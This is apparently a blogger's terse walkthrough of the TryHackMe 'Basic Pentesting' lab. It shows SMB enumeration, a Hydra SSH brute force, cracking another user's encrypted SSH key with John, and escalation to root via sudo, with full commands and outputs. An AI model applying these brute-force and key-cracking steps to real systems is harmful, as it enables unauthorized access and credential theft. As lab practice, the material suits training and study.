Update 11 June 2021

CAP

I did CAP from HTB. It’s active so no writeup. It’s probably the easiest modern HTB machine I’ve done. No new releases from VulnHub lately. I also did Basic Pentesting and yes it was basic.

We have SSH, SMB and a webserver. We’ve got anonymous access on the SMB and we can get a username; it hints that we can upload but that’s not something we end up doing:

┌──(root💀kali)-[/opt/thm/basic]
└─# smbclient -L //10.10.142.44
Enter WORKGROUP\root's password: 

        Sharename       Type      Comment
        ---------       ----      -------
        Anonymous       Disk      
        IPC$            IPC       IPC Service (Samba Server 4.3.11-Ubuntu)
SMB1 disabled -- no workgroup available
                                                                                                                                       
┌──(root💀kali)-[/opt/thm/basic]
└─# smbclient  //10.10.142.44/Anonymous
Enter WORKGROUP\root's password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu Apr 19 13:31:20 2018
  ..                                  D        0  Thu Apr 19 13:13:06 2018
  staff.txt                           N      173  Thu Apr 19 13:29:55 2018
get
                14318640 blocks of size 1024. 10822624 blocks available
smb: \> get staff.txt
getting file \staff.txt of size 173 as staff.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \> exit
                                                                                                                                       
┌──(root💀kali)-[/opt/thm/basic]
└─# cat staff.txt           
Announcement to staff:

PLEASE do not upload non-work-related items to this share. I know it's all in fun, but
this is how mistakes happen. (This means you too, Jan!)

-Kay

With our username, we can bruteforce SSH:

┌──(root💀kali)-[/opt/thm/basic]
└─# hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://10.10.142.44
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-06-11 07:37:41
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://10.10.142.44:22/
[STATUS] 172.00 tries/min, 172 tries in 00:01h, 14344228 to do in 1389:57h, 16 active
[STATUS] 112.33 tries/min, 337 tries in 00:03h, 14344063 to do in 2128:12h, 16 active
[STATUS] 105.71 tries/min, 740 tries in 00:07h, 14343660 to do in 2261:24h, 16 active
[22][ssh] host: 10.10.142.44   login: jan   password: armando
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 1 final worker threads did not complete until end.
[ERROR] 1 target did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-06-11 07:45:02

And from there we can SSH in as Jan. We can read files in Kay’s home, including her (encrypted) SSH private key which we can then crack and login as Kay:

# on the box
jan@basic2:/home/kay/.ssh$ ls -lash
total 20K
4.0K drwxr-xr-x 2 kay kay 4.0K Apr 23  2018 .
4.0K drwxr-xr-x 5 kay kay 4.0K Apr 23  2018 ..
4.0K -rw-rw-r-- 1 kay kay  771 Apr 23  2018 authorized_keys
4.0K -rw-r--r-- 1 kay kay 3.3K Apr 19  2018 id_rsa
4.0K -rw-r--r-- 1 kay kay  771 Apr 19  2018 id_rsa.pub
jan@basic2:/home/kay/.ssh$ cat id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,6ABA7DE35CDB65070B92C1F760E2FE75

IoNb/J0q2Pd56EZ23oAaJxLvhuSZ1crRr4ONGUAnKcRxg3+9vn6xcujpzUDuUtlZ
o9dyIEJB4wUZTueBPsmb487RdFVkTOVQrVHty1K2aLy2Lka2Cnfjz8Llv+FMadsN
# key goes here, cut for brevity
jan@basic2:/home/kay/.ssh$ 

# in kali

┌──(root💀kali)-[/opt/thm/basic]
└─# locate ssh2john                      
/usr/share/john/ssh2john.py
                                                                                                                                       
┌──(root💀kali)-[/opt/thm/basic]
└─# python /usr/share/john/ssh2john.py key > key.john         
                                                                                                                                       
┌──(root💀kali)-[/opt/thm/basic]
└─# john key.john -w=/usr/share/wordlists/rockyou.txt             
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 2 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
beeswax          (key)
1g 0:00:00:03 DONE (2021-06-11 07:48) 0.2695g/s 3865Kp/s 3865Kc/s 3865KC/sa6_123..*7¡Vamos!
Session completed
                                                                                                                                       
┌──(root💀kali)-[/opt/thm/basic]
└─# chmod 600 key   
                                                                                                                                       
┌──(root💀kali)-[/opt/thm/basic]
└─# ssh -i key [email protected]          
Enter passphrase for key 'key': 
Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.4.0-119-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

0 packages can be updated.
0 updates are security updates.


Last login: Mon Apr 23 16:04:07 2018 from 192.168.56.102
kay@basic2

We get Kay’s password backup, and then we can get root:

kay@basic2:~$ ls -lash
total 48K
4.0K drwxr-xr-x 5 kay  kay  4.0K Apr 23  2018 .
4.0K drwxr-xr-x 4 root root 4.0K Apr 19  2018 ..
4.0K -rw------- 1 kay  kay   756 Apr 23  2018 .bash_history
4.0K -rw-r--r-- 1 kay  kay   220 Apr 17  2018 .bash_logout
4.0K -rw-r--r-- 1 kay  kay  3.7K Apr 17  2018 .bashrc
4.0K drwx------ 2 kay  kay  4.0K Apr 17  2018 .cache
4.0K -rw------- 1 root kay   119 Apr 23  2018 .lesshst
4.0K drwxrwxr-x 2 kay  kay  4.0K Apr 23  2018 .nano
4.0K -rw------- 1 kay  kay    57 Apr 23  2018 pass.bak
4.0K -rw-r--r-- 1 kay  kay   655 Apr 17  2018 .profile
4.0K drwxr-xr-x 2 kay  kay  4.0K Apr 23  2018 .ssh
   0 -rw-r--r-- 1 kay  kay     0 Apr 17  2018 .sudo_as_admin_successful
4.0K -rw------- 1 root kay   538 Apr 23  2018 .viminfo
kay@basic2:~$ cat pass.bak
heresareallystrongpasswordthatfollowsthepasswordpolicy$$
kay@basic2:~$ sudo -l
[sudo] password for kay: 
Matching Defaults entries for kay on basic2:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User kay may run the following commands on basic2:
    (ALL : ALL) ALL
kay@basic2:~$ sudo su
root@basic2:/home/kay# cd /root
root@basic2:~# id;hostname;date
uid=0(root) gid=0(root) groups=0(root)
basic2
Fri Jun 11 07:50:04 EDT 2021
root@basic2:~#

Now I’ve got to go watch the footy. Man I’m really phoning in these writeups.